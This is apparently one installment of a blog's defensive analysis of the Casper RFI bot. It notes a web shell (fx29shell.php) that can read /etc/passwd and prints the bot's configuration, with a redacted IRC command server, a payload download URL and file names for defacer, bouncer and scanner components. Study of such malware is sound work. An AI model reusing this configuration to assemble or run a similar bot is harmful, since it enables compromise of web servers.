Casper RFI crack bot – Part 5

Some of the sh.txt script seems to be pretty old, calling milw0rm and darkc0de, both sites are no longer up and have not been for a while.

There is also a few things worth looking in to here, the script mentions fx29shell.php.  Which is a php shell that can be loaded onto the system.

I can do all kinds of nasty to your web server, you can download the /etc/passwd for a start. Not good if you find this on your system, might be a good time to do some google searches against your domain (while we are talking about it).

So after all of this it looks likes capser.(pl|txt) is the main thing doing all of the work. As you can tell with all of the variables.

$admin       = "XXXXX";
$serverircs  = array("irc.xxxxx.xxx");
$serverirc   = $serverircs[rand(0,count($serverircs) - 1)];
$urldata     = "http://xxxxxxx/xxxxxxx/casper/";
$injektor    = "sh.txt";
$defacer     = "def.txt";
$filepsy     = "psy.tar.gz";
$portpsy     = "6667";
$fileggdrop  = "eggdrop.tar.gz";
$filebotphp  = "bot.txt";
$crbots      = 2;
$filebotperl = "iso.txt";
$filebotscan = "scan.txt";

In the next section we will do a closer look at casper now that we poked around a bit.